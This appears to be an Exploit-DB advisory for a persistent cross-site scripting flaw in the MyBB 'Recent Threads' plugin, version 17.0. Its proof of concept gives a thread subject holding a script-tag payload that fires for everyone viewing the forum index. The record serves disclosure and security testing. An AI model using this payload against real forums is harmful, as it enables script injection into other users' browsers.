MyBB Plugin Recent Threads On Index - Cross-Site Scripting

EDB-ID:

44420

CVE:

N/A


Author:

Perileos

Type:

webapps


Platform:

PHP

Date:

2018-04-09


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: MyBB Recent threads
# Date: 4th April 2018
# Exploit Author: Perileos
# Software Link: https://community.mybb.com/mods.php?action=view&pid=191
# Version: 17.0
# Tested on: Windows 10

1. Description:
This plugin shows recent threads in the side bar on your MyBB forum.

2. Proof of concept:

Persistent XSS
- Create a thread with the following subject <p
"""><SCRIPT>alert("XSS")</SCRIPT>">
- Navigate to the index to see a board wide persistent XSS alert.